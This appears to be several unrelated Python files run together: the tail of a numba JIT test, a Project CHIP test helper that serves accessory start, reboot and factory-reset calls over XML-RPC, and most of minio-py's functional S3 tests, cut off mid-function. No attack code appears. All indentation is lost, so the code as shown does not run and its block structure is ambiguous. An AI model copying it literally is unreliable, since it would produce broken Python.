def bar(x):
return x[0]
@jit(nopython=True)
def foobar(x):
bar(x)
@jit(nopython=True)
def foo(x):
return bar(x) + foobar(x)
self.run_test(foo)
def test_error_count(self):
def check(field, would_fail):
# Slightly modified from the reproducer in issue #4117.
# Before the patch, the compilation time of the failing case is
# much longer than of the successful case. This can be detected
# by the number of times `trigger()` is visited.
k = 10
counter = {'c': 0}
@generated_jit
def trigger(x):
# Keep track of every visit
counter['c'] += 1
if would_fail:
raise errors.TypingError("invoke_failed")
return lambda x: x
@jit(nopython=True)
def ident(out, x):
pass
def chain_assign(fs, inner=ident):
tab_head, tab_tail = fs[-1], fs[:-1]
@jit(nopython=True)
def assign(out, x):
inner(out, x)
out[0] += tab_head(x)
if tab_tail:
return chain_assign(tab_tail, assign)
else:
return assign
chain = chain_assign((trigger,) * k)
out = np.ones(2)
if would_fail:
with self.assertRaises(errors.TypingError) as raises:
chain(out, 1)
self.assertIn('invoke_failed', str(raises.exception))
else:
chain(out, 1)
# Returns the visit counts
return counter['c']
ct_ok = check('a', False)
ct_bad = check('c', True)
# `trigger()` is visited exactly once for both successful and failed
# compilation.
self.assertEqual(ct_ok, 1)
self.assertEqual(ct_bad, 1)
if __name__ == '__main__':
unittest.main()
|
accessories.py
|
#
# Copyright (c) 2021 Project CHIP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import sys
import threading
from xmlrpc.server import SimpleXMLRPCServer
IP = '127.0.0.1'
PORT = 9000
if sys.platform == 'linux':
IP = '10.10.10.5'
class AppsRegister:
_instance = None
__accessories = {}
def init(self):
self.__startXMLRPCServer()
def uninit(self):
self.__stopXMLRPCServer()
@property
def accessories(self):
"""List of registered accessory applications."""
return self.__accessories.values()
def add(self, name, accessory):
self.__accessories[name] = accessory
def remove(self, name):
self.__accessories.pop(name)
def removeAll(self):
self.__accessories = {}
def kill(self, name):
accessory = self.__accessories[name]
if accessory:
accessory.kill()
def killAll(self):
for accessory in self.__accessories.values():
accessory.kill()
def start(self, name, args):
accessory = self.__accessories[name]
if accessory:
# The args param comes directly from the sys.argv[1:] of Start.py and should contain a list of strings in
# key-value pair, e.g. [option1, value1, option2, value2, ...]
options = self.__createCommandLineOptions(args)
return accessory.start(options)
return False
def stop(self, name):
accessory = self.__accessories[name]
if accessory:
return accessory.stop()
return False
def reboot(self, name, args):
accessory = self.__accessories[name]
if accessory:
# The args param comes directly from the sys.argv[1:] of Reboot.py and should contain a list of strings in
# key-value pair, e.g. [option1, value1, option2, value2, ...]
options = self.__createCommandLineOptions(args)
return accessory.stop() and accessory.start(options)
return False
def factoryResetAll(self):
for accessory in self.__accessories.values():
accessory.factoryReset()
def factoryReset(self, name):
accessory = self.__accessories[name]
if accessory:
return accessory.factoryReset()
return False
def waitForCommissionableAdvertisement(self, name):
accessory = self.__accessories[name]
if accessory:
return accessory.waitForCommissionableAdvertisement()
return False
def waitForOperationalAdvertisement(self, name):
accessory = self.__accessories[name]
if accessory:
return accessory.waitForOperationalAdvertisement()
return False
def __startXMLRPCServer(self):
self.server = SimpleXMLRPCServer((IP, PORT))
self.server.register_function(self.start, 'start')
self.server.register_function(self.stop, 'stop')
self.server.register_function(self.reboot, 'reboot')
self.server.register_function(self.factoryReset, 'factoryReset')
self.server.register_function(
self.waitForCommissionableAdvertisement,
'waitForCommissionableAdvertisement')
self.server.register_function(
self.waitForOperationalAdvertisement,
'waitForOperationalAdvertisement')
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.start()
def __stopXMLRPCServer(self):
self.server.shutdown()
def __createCommandLineOptions(self, args):
if not args:
return {}
# args should contain a list of strings in key-value pair, e.g. [option1, value1, option2, value2, ...]
if (len(args) % 2) != 0:
logging.warning("Unexpected command line options %r - not key/value pairs (odd length)" % (args,))
return {}
# Create a dictionary from the key-value pair list
options = {args[i]: args[i+1] for i in range(0, len(args), 2)}
return options
|
tests.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# MinIO Python Library for Amazon S3 Compatible Cloud Storage,
# (C) 2015, 2016, 2017, 2018 MinIO, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=too-many-lines
"""Functional tests of minio-py."""
from __future__ import absolute_import, division
import hashlib
import io
import json
import math
import os
import random
import shutil
import sys
import tempfile
import time
import traceback
from datetime import datetime, timedelta
from threading import Thread
from uuid import uuid4
import certifi
import urllib3
from minio import CopyConditions, Minio, PostPolicy
from minio.commonconfig import ENABLED
from minio.deleteobjects import DeleteObject
from minio.error import S3Error
from minio.select.helpers import calculate_crc
from minio.selectrequest import (CSVInputSerialization, CSVOutputSerialization,
SelectRequest)
from minio.sse import SseCustomerKey
from minio.versioningconfig import VersioningConfig
if sys.version_info[0] == 2:
from datetime import tzinfo # pylint: disable=ungrouped-imports
class UTC(tzinfo):
"""UTC"""
def utcoffset(self, dt):
return timedelta(0)
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return timedelta(0)
UTC = UTC()
from inspect import getargspec
GETARGSSPEC = getargspec
else:
from datetime import timezone # pylint: disable=ungrouped-imports
UTC = timezone.utc
from inspect import getfullargspec # pylint: disable=ungrouped-imports
GETARGSSPEC = getfullargspec
_CLIENT = None # initialized in main().
_TEST_FILE = None # initialized in main().
_LARGE_FILE = None # initialized in main().
_IS_AWS = None # initialized in main().
KB = 1024
MB = 1024 * KB
HTTP = urllib3.PoolManager(
cert_reqs='CERT_REQUIRED',
ca_certs=os.environ.get('SSL_CERT_FILE') or certifi.where()
)
def _gen_bucket_name():
"""Generate random bucket name."""
return "minio-py-test-{0}".format(uuid4())
def _get_sha256sum(filename):
"""Get SHA-256 checksum of given file."""
with open(filename, 'rb') as file:
contents = file.read()
return hashlib.sha256(contents).hexdigest()
def _get_random_string(size):
"""Get random string of given size."""
if not size:
return ""
chars = "abcdefghijklmnopqrstuvwxyz"
chars *= int(math.ceil(size / len(chars)))
chars = list(chars[:size])
random.shuffle(chars)
return "".join(chars)
class LimitedRandomReader: # pylint: disable=too-few-public-methods
"""Random data reader of specified size."""
def __init__(self, limit):
self._limit = limit
def read(self, size=64*KB):
"""Read random data of specified size."""
if size < 0 or size > self._limit:
size = self._limit
data = _get_random_string(size)
self._limit -= size
return data.encode()
def _call(log_entry, func, *args, **kwargs):
"""Execute given function."""
log_entry["method"] = func
return func(*args, **kwargs)
class TestFailed(Exception):
"""Indicate test failed error."""
def _call_test(func, *args, **kwargs):
"""Execute given test function."""
log_entry = {
"name": func.__name__,
"status": "PASS",
}
start_time = time.time()
try:
func(log_entry, *args, **kwargs)
except S3Error as exc:
if exc.code == "NotImplemented":
log_entry["alert"] = "Not Implemented"
log_entry["status"] = "NA"
else:
log_entry["message"] = "{0}".format(exc)
log_entry["error"] = traceback.format_exc()
log_entry["status"] = "FAIL"
except Exception as exc: # pylint: disable=broad-except
log_entry["message"] = "{0}".format(exc)
log_entry["error"] = traceback.format_exc()
log_entry["status"] = "FAIL"
if log_entry.get("method"):
log_entry["function"] = "{0}({1})".format(
log_entry["method"].__name__,
# pylint: disable=deprecated-method
', '.join(GETARGSSPEC(log_entry["method"]).args[1:]))
log_entry["args"] = {
k: v for k, v in log_entry.get("args", {}).items() if v
}
log_entry["duration"] = int(
round((time.time() - start_time) * 1000))
log_entry["name"] = 'minio-py:' + log_entry["name"]
log_entry["method"] = None
print(json.dumps({k: v for k, v in log_entry.items() if v}))
if log_entry["status"] == "FAIL":
raise TestFailed()
def test_make_bucket_default_region(log_entry):
"""Test make_bucket() with default region."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
"location": "default value ('us-east-1')", # Default location
}
# Create a bucket with default bucket location
_call(log_entry, _CLIENT.make_bucket, bucket_name)
# Check if bucket was created properly
_call(log_entry, _CLIENT.bucket_exists, bucket_name)
# Remove bucket
_call(log_entry, _CLIENT.remove_bucket, bucket_name)
# Test passes
log_entry["method"] = _CLIENT.make_bucket
def test_make_bucket_with_region(log_entry):
"""Test make_bucket() with region."""
# Only test make bucket with region against AWS S3
if not _IS_AWS:
return
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
# A non-default location
location = 'us-west-1'
log_entry["args"] = {
"bucket_name": bucket_name,
"location": location,
}
# Create a bucket with default bucket location
_call(log_entry, _CLIENT.make_bucket, bucket_name, location)
# Check if bucket was created properly
_call(log_entry, _CLIENT.bucket_exists, bucket_name)
# Remove bucket
_call(log_entry, _CLIENT.remove_bucket, bucket_name)
# Test passes
log_entry["method"] = _CLIENT.make_bucket
def test_negative_make_bucket_invalid_name( # pylint: disable=invalid-name
log_entry):
"""Test make_bucket() with invalid bucket name."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
# Default location
log_entry["args"] = {
"location": "default value ('us-east-1')",
}
# Create an array of invalid bucket names to test
invalid_bucket_name_list = [
bucket_name + '.',
'.' + bucket_name,
bucket_name + '...abcd'
]
for name in invalid_bucket_name_list:
log_entry["args"]["bucket_name"] = name
try:
# Create a bucket with default bucket location
_call(log_entry, _CLIENT.make_bucket, name)
# Check if bucket was created properly
_call(log_entry, _CLIENT.bucket_exists, name)
# Remove bucket
_call(log_entry, _CLIENT.remove_bucket, name)
except ValueError:
pass
# Test passes
log_entry["method"] = _CLIENT.make_bucket
log_entry["args"]['bucket_name'] = invalid_bucket_name_list
def test_list_buckets(log_entry):
"""Test list_buckets()."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
# Create a bucket with default bucket location
_call(log_entry, _CLIENT.make_bucket, bucket_name)
try:
buckets = _CLIENT.list_buckets()
for bucket in buckets:
# bucket object should be of a valid value.
if bucket.name and bucket.creation_date:
continue
raise ValueError('list_bucket api failure')
finally:
# Remove bucket
_call(log_entry, _CLIENT.remove_bucket, bucket_name)
def test_select_object_content(log_entry):
"""Test select_object_content()."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
csvfile = 'test.csv'
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": csvfile,
}
try:
_CLIENT.make_bucket(bucket_name)
content = io.BytesIO(b"col1,col2,col3\none,two,three\nX,Y,Z\n")
_CLIENT.put_object(bucket_name, csvfile, content,
len(content.getvalue()))
request = SelectRequest(
"select * from s3object",
CSVInputSerialization(),
CSVOutputSerialization(),
request_progress=True,
)
data = _CLIENT.select_object_content(bucket_name, csvfile, request)
# Get the records
records = io.BytesIO()
for data_bytes in data.stream(10*KB):
records.write(data_bytes.encode('utf-8'))
expected_crc = calculate_crc(content.getvalue())
generated_crc = calculate_crc(records.getvalue())
if expected_crc != generated_crc:
raise ValueError(
'Data mismatch Expected : '
'"col1,col2,col3\none,two,three\nX,Y,Z\n"',
'Received {}', records)
finally:
_CLIENT.remove_object(bucket_name, csvfile)
_CLIENT.remove_bucket(bucket_name)
def _test_fput_object(bucket_name, object_name, filename, metadata, sse):
"""Test fput_object()."""
try:
_CLIENT.make_bucket(bucket_name)
if _IS_AWS:
_CLIENT.fput_object(bucket_name, object_name, filename,
metadata=metadata, sse=sse)
else:
_CLIENT.fput_object(bucket_name, object_name, filename, sse=sse)
_CLIENT.stat_object(bucket_name, object_name, sse=sse)
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_fput_object_small_file(log_entry, sse=None):
"""Test fput_object() with small file."""
if sse:
log_entry["name"] += "_with_SSE-C"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}-f".format(uuid4())
metadata = {'x-amz-storage-class': 'STANDARD_IA'}
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"file_path": _TEST_FILE,
"metadata": metadata,
}
_test_fput_object(bucket_name, object_name, _TEST_FILE, metadata, sse)
def test_fput_object_large_file(log_entry, sse=None):
"""Test fput_object() with large file."""
if sse:
log_entry["name"] += "_with_SSE-C"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}-large".format(uuid4())
metadata = {'x-amz-storage-class': 'STANDARD_IA'}
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"file_path": _LARGE_FILE,
"metadata": metadata,
}
# upload local large file through multipart.
_test_fput_object(bucket_name, object_name, _LARGE_FILE, metadata, sse)
def test_fput_object_with_content_type( # pylint: disable=invalid-name
log_entry):
"""Test fput_object() with content-type."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}-f".format(uuid4())
metadata = {'x-amz-storage-class': 'STANDARD_IA'}
content_type = 'application/octet-stream'
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"file_path": _TEST_FILE,
"metadata": metadata,
"content_type": content_type,
}
_test_fput_object(bucket_name, object_name, _TEST_FILE, metadata, None)
def _validate_stat(st_obj, expected_size, expected_meta, version_id=None):
"""Validate stat information."""
expected_meta = {
key.lower(): value for key, value in (expected_meta or {}).items()
}
received_modification_time = st_obj.last_modified
received_etag = st_obj.etag
received_metadata = {
key.lower(): value for key, value in (st_obj.metadata or {}).items()
}
received_content_type = st_obj.content_type
received_size = st_obj.size
received_is_dir = st_obj.is_dir
if not isinstance(received_modification_time, time.struct_time):
raise ValueError('Incorrect last_modified time type'
', received type: ', type(received_modification_time))
if not received_etag:
raise ValueError('No Etag value is returned.')
if st_obj.version_id != version_id:
raise ValueError(
"version-id mismatch. expected={0}, got={1}".format(
version_id, st_obj.version_id,
),
)
# content_type by default can be either application/octet-stream or
# binary/octet-stream
if received_content_type not in [
'application/octet-stream', 'binary/octet-stream']:
raise ValueError('Incorrect content type. Expected: ',
"'application/octet-stream' or 'binary/octet-stream',"
" received: ", received_content_type)
if received_size != expected_size:
raise ValueError('Incorrect file size. Expected: 11534336',
', received: ', received_size)
if received_is_dir:
raise ValueError('Incorrect file type. Expected: is_dir=False',
', received: is_dir=', received_is_dir)
if not all(i in received_metadata.items() for i in expected_meta.items()):
raise ValueError("Metadata key 'x-amz-meta-testing' not found")
def test_copy_object_no_copy_condition( # pylint: disable=invalid-name
log_entry, ssec_copy=None, ssec=None):
"""Test copy_object() with no conditiions."""
if ssec_copy or ssec:
log_entry["name"] += "_SSEC"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
object_source = object_name + "-source"
object_copy = object_name + "-copy"
log_entry["args"] = {
"bucket_name": bucket_name,
"object_source": object_source,
"object_name": object_copy,
}
try:
_CLIENT.make_bucket(bucket_name)
# Upload a streaming object of 1 KiB
size = 1 * KB
reader = LimitedRandomReader(size)
_CLIENT.put_object(bucket_name, object_source, reader, size, sse=ssec)
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source,
source_sse=ssec_copy, sse=ssec)
st_obj = _CLIENT.stat_object(bucket_name, object_copy, sse=ssec)
_validate_stat(st_obj, size, {})
finally:
_CLIENT.remove_object(bucket_name, object_source)
_CLIENT.remove_object(bucket_name, object_copy)
_CLIENT.remove_bucket(bucket_name)
def test_copy_object_with_metadata(log_entry):
"""Test copy_object() with metadata."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
object_source = object_name + "-source"
object_copy = object_name + "-copy"
metadata = {"testing-string": "string",
"testing-int": 1}
log_entry["args"] = {
"bucket_name": bucket_name,
"object_source": object_source,
"object_name": object_copy,
"metadata": metadata,
}
try:
_CLIENT.make_bucket(bucket_name)
# Upload a streaming object of 1 KiB
size = 1 * KB
reader = LimitedRandomReader(size)
_CLIENT.put_object(bucket_name, object_source, reader, size)
# Perform a server side copy of an object
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source,
metadata=metadata)
# Verification
st_obj = _CLIENT.stat_object(bucket_name, object_copy)
expected_metadata = {'x-amz-meta-testing-int': '1',
'x-amz-meta-testing-string': 'string'}
_validate_stat(st_obj, size, expected_metadata)
finally:
_CLIENT.remove_object(bucket_name, object_source)
_CLIENT.remove_object(bucket_name, object_copy)
_CLIENT.remove_bucket(bucket_name)
def test_copy_object_etag_match(log_entry):
"""Test copy_object() with etag match condition."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
object_source = object_name + "-source"
object_copy = object_name + "-copy"
log_entry["args"] = {
"bucket_name": bucket_name,
"object_source": object_source,
"object_name": object_copy,
}
try:
_CLIENT.make_bucket(bucket_name)
# Upload a streaming object of 1 KiB
size = 1 * KB
reader = LimitedRandomReader(size)
_CLIENT.put_object(bucket_name, object_source, reader, size)
# Perform a server side copy of an object
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source)
# Verification
source_etag = _CLIENT.stat_object(bucket_name, object_source).etag
copy_conditions = CopyConditions()
copy_conditions.set_match_etag(source_etag)
log_entry["args"]["conditions"] = {'set_match_etag': source_etag}
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source,
copy_conditions)
finally:
_CLIENT.remove_object(bucket_name, object_source)
_CLIENT.remove_object(bucket_name, object_copy)
_CLIENT.remove_bucket(bucket_name)
def test_copy_object_negative_etag_match( # pylint: disable=invalid-name
log_entry):
"""Test copy_object() with etag not match condition."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
object_source = object_name + "-source"
object_copy = object_name + "-copy"
log_entry["args"] = {
"bucket_name": bucket_name,
"object_source": object_source,
"object_name": object_copy,
}
try:
_CLIENT.make_bucket(bucket_name)
# Upload a streaming object of 1 KiB
size = 1 * KB
reader = LimitedRandomReader(size)
_CLIENT.put_object(bucket_name, object_source, reader, size)
try:
# Perform a server side copy of an object
# with incorrect pre-conditions and fail
etag = 'test-etag'
copy_conditions = CopyConditions()
copy_conditions.set_match_etag(etag)
log_entry["args"]["conditions"] = {'set_match_etag': etag}
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source,
copy_conditions)
except S3Error as exc:
if exc.code != "PreconditionFailed":
raise
finally:
_CLIENT.remove_object(bucket_name, object_source)
_CLIENT.remove_object(bucket_name, object_copy)
_CLIENT.remove_bucket(bucket_name)
def test_copy_object_modified_since(log_entry):
"""Test copy_object() with modified since condition."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
object_source = object_name + "-source"
object_copy = object_name + "-copy"
log_entry["args"] = {
"bucket_name": bucket_name,
"object_source": object_source,
"object_name": object_copy,
}
try:
_CLIENT.make_bucket(bucket_name)
# Upload a streaming object of 1 KiB
size = 1 * KB
reader = LimitedRandomReader(size)
_CLIENT.put_object(bucket_name, object_source, reader, size)
# Set up the 'modified_since' copy condition
copy_conditions = CopyConditions()
mod_since = datetime(2014, 4, 1, tzinfo=UTC)
copy_conditions.set_modified_since(mod_since)
log_entry["args"]["conditions"] = {
'set_modified_since': mod_since.strftime('%c')}
# Perform a server side copy of an object
# and expect the copy to complete successfully
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source,
copy_conditions)
finally:
_CLIENT.remove_object(bucket_name, object_source)
_CLIENT.remove_object(bucket_name, object_copy)
_CLIENT.remove_bucket(bucket_name)
def test_copy_object_unmodified_since( # pylint: disable=invalid-name
log_entry):
"""Test copy_object() with unmodified since condition."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
object_source = object_name + "-source"
object_copy = object_name + "-copy"
log_entry["args"] = {
"bucket_name": bucket_name,
"object_source": object_source,
"object_name": object_copy,
}
try:
_CLIENT.make_bucket(bucket_name)
# Upload a streaming object of 1 KiB
size = 1 * KB
reader = LimitedRandomReader(size)
_CLIENT.put_object(bucket_name, object_source, reader, size)
# Set up the 'unmodified_since' copy condition
copy_conditions = CopyConditions()
unmod_since = datetime(2014, 4, 1, tzinfo=UTC)
copy_conditions.set_unmodified_since(unmod_since)
log_entry["args"]["conditions"] = {
'set_unmodified_since': unmod_since.strftime('%c')}
try:
# Perform a server side copy of an object and expect
# the copy to fail since the creation/modification
# time is now, way later than unmodification time, April 1st, 2014
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source,
copy_conditions)
except S3Error as exc:
if exc.code != "PreconditionFailed":
raise
finally:
_CLIENT.remove_object(bucket_name, object_source)
_CLIENT.remove_object(bucket_name, object_copy)
_CLIENT.remove_bucket(bucket_name)
def test_put_object(log_entry, sse=None):
"""Test put_object()."""
if sse:
log_entry["name"] += "_SSE"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
length = 1 * MB
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"length": length,
"data": "LimitedRandomReader(1 * MB)"
}
try:
_CLIENT.make_bucket(bucket_name)
# Put/Upload a streaming object of 1 MiB
reader = LimitedRandomReader(length)
_CLIENT.put_object(bucket_name, object_name, reader, length, sse=sse)
_CLIENT.stat_object(bucket_name, object_name, sse=sse)
# Put/Upload a streaming object of 11 MiB
log_entry["args"]["length"] = length = 11 * MB
reader = LimitedRandomReader(length)
log_entry["args"]["data"] = "LimitedRandomReader(11 * MB)"
log_entry["args"]["metadata"] = metadata = {
'x-amz-meta-testing': 'value', 'test-key': 'value2'}
log_entry["args"]["content_type"] = content_type = (
"application/octet-stream")
log_entry["args"]["object_name"] = object_name + "-metadata"
_CLIENT.put_object(bucket_name, object_name + "-metadata", reader,
length, content_type, metadata, sse=sse)
# Stat on the uploaded object to check if it exists
# Fetch saved stat metadata on a previously uploaded object with
# metadata.
st_obj = _CLIENT.stat_object(bucket_name, object_name + "-metadata",
sse=sse)
normalized_meta = {
key.lower(): value for key, value in (
st_obj.metadata or {}).items()
}
if 'x-amz-meta-testing' not in normalized_meta:
raise ValueError("Metadata key 'x-amz-meta-testing' not found")
value = normalized_meta['x-amz-meta-testing']
if value != 'value':
raise ValueError('Metadata key has unexpected'
' value {0}'.format(value))
if 'x-amz-meta-test-key' not in normalized_meta:
raise ValueError("Metadata key 'x-amz-meta-test-key' not found")
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_object(bucket_name, object_name+'-metadata')
_CLIENT.remove_bucket(bucket_name)
def test_negative_put_object_with_path_segment( # pylint: disable=invalid-name
log_entry):
"""Test put_object() failure with path segment."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "/a/b/c/{0}".format(uuid4())
length = 0
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"length": length,
"data": "",
}
try:
_CLIENT.make_bucket(bucket_name)
_CLIENT.put_object(bucket_name, object_name, io.BytesIO(b''), 0)
_CLIENT.remove_object(bucket_name, object_name)
except S3Error as err:
if err.code != 'XMinioInvalidObjectName':
raise
finally:
_CLIENT.remove_bucket(bucket_name)
def _test_stat_object(log_entry, sse=None, version_check=False):
"""Test stat_object()."""
if sse:
log_entry["name"] += "_SSEC"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
length = 1 * MB
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"length": length,
"data": "LimitedRandomReader(1 * MB)"
}
version_id1 = None
version_id2 = None
_CLIENT.make_bucket(bucket_name)
try:
if version_check:
_CLIENT.set_bucket_versioning(
bucket_name, VersioningConfig(ENABLED),
)
# Put/Upload a streaming object of 1 MiB
reader = LimitedRandomReader(length)
result = _CLIENT.put_object(
bucket_name, object_name, reader, length, sse=sse,
)
version_id1 = result.version_id
_CLIENT.stat_object(
bucket_name, object_name, sse=sse, version_id=version_id1,
)
# Put/Upload a streaming object of 11 MiB
log_entry["args"]["length"] = length = 11 * MB
reader = LimitedRandomReader(length)
log_entry["args"]["data"] = "LimitedRandomReader(11 * MB)"
log_entry["args"]["metadata"] = metadata = {
'X-Amz-Meta-Testing': 'value'}
log_entry["args"]["content_type"] = content_type = (
"application/octet-stream")
log_entry["args"]["object_name"] = object_name + "-metadata"
result = _CLIENT.put_object(
bucket_name, object_name + "-metadata", reader,
length, content_type, metadata, sse=sse,
)
version_id2 = result.version_id
# Stat on the uploaded object to check if it exists
# Fetch saved stat metadata on a previously uploaded object with
# metadata.
st_obj = _CLIENT.stat_object(
bucket_name, object_name + "-metadata",
sse=sse, version_id=version_id2,
)
# Verify the collected stat data.
_validate_stat(
st_obj, length, metadata, version_id=version_id2,
)
finally:
_CLIENT.remove_object(bucket_name, object_name, version_id=version_id1)
_CLIENT.remove_object(
bucket_name, object_name+'-metadata', version_id=version_id2,
)
_CLIENT.remove_bucket(bucket_name)
def test_stat_object(log_entry, sse=None):
"""Test stat_object()."""
_test_stat_object(log_entry, sse)
def test_stat_object_version(log_entry, sse=None):
"""Test stat_object() of versioned object."""
_test_stat_object(log_entry, sse, version_check=True)
def _test_remove_object(log_entry, version_check=False):
"""Test remove_object()."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
length = 1 * KB
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
try:
if version_check:
_CLIENT.set_bucket_versioning(
bucket_name, VersioningConfig(ENABLED),
)
result = _CLIENT.put_object(
bucket_name, object_name, LimitedRandomReader(length), length,
)
_CLIENT.remove_object(
bucket_name, object_name, version_id=result.version_id,
)
finally:
_CLIENT.remove_bucket(bucket_name)
def test_remove_object(log_entry):
"""Test remove_object()."""
_test_remove_object(log_entry)
def test_remove_object_version(log_entry):
"""Test remove_object() of versioned object."""
_test_remove_object(log_entry, version_check=True)
def _test_get_object(log_entry, sse=None, version_check=False):
"""Test get_object()."""
if sse:
log_entry["name"] += "_SSEC"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
length = 1 * MB
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
version_id = None
try:
if version_check:
_CLIENT.set_bucket_versioning(
bucket_name, VersioningConfig(ENABLED),
)
result = _CLIENT.put_object(
bucket_name, object_name, LimitedRandomReader(length),
length, sse=sse,
)
version_id = result.version_id
# Get/Download a full object, iterate on response to save to disk
object_data = _CLIENT.get_object(
bucket_name, object_name, sse=sse, version_id=version_id,
)
newfile = 'newfile جديد'
with open(newfile, 'wb') as file_data:
shutil.copyfileobj(object_data, file_data)
os.remove(newfile)
finally:
_CLIENT.remove_object(bucket_name, object_name, version_id=version_id)
_CLIENT.remove_bucket(bucket_name)
def test_get_object(log_entry, sse=None):
"""Test get_object()."""
_test_get_object(log_entry, sse)
def test_get_object_version(log_entry, sse=None):
"""Test get_object() for versioned object."""
_test_get_object(log_entry, sse, version_check=True)
def _test_fget_object(log_entry, sse=None, version_check=False):
"""Test fget_object()."""
if sse:
log_entry["name"] += "_SSEC"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
tmpfd, tmpfile = tempfile.mkstemp()
os.close(tmpfd)
length = 1 * MB
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"file_path": tmpfile
}
_CLIENT.make_bucket(bucket_name)
version_id = None
try:
if version_check:
_CLIENT.set_bucket_versioning(
bucket_name, VersioningConfig(ENABLED),
)
result = _CLIENT.put_object(
bucket_name, object_name, LimitedRandomReader(length),
length, sse=sse,
)
version_id = result.version_id
# Get/Download a full object and save locally at path
_CLIENT.fget_object(
bucket_name, object_name, tmpfile, sse=sse, version_id=version_id,
)
os.remove(tmpfile)
finally:
_CLIENT.remove_object(bucket_name, object_name, version_id=version_id)
_CLIENT.remove_bucket(bucket_name)
def test_fget_object(log_entry, sse=None):
"""Test fget_object()."""
_test_fget_object(log_entry, sse)
def test_fget_object_version(log_entry, sse=None):
"""Test fget_object() of versioned object."""
_test_fget_object(log_entry, sse, version_check=True)
def test_get_object_with_default_length( # pylint: disable=invalid-name
log_entry, sse=None):
"""Test get_object() with default length."""
if sse:
log_entry["name"] += "_SSEC"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
size = 1 * MB
length = 1000
offset = size - length
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"offset": offset
}
_CLIENT.make_bucket(bucket_name)
try:
_CLIENT.put_object(bucket_name, object_name,
LimitedRandomReader(size), size, sse=sse)
# Get half of the object
object_data = _CLIENT.get_object(bucket_name, object_name,
offset=offset, sse=sse)
newfile = 'newfile'
with open(newfile, 'wb') as file_data:
for data in object_data:
file_data.write(data)
# Check if the new file is the right size
new_file_size = os.path.getsize(newfile)
os.remove(newfile)
if new_file_size != length:
raise ValueError('Unexpected file size after running ')
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_get_partial_object(log_entry, sse=None):
"""Test get_object() by offset/length."""
if sse:
log_entry["name"] += "_SSEC"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
size = 1 * MB
offset = int(size / 2)
length = offset - 1000
log_entry["args"] = {
"bucket_name": bucket_name,
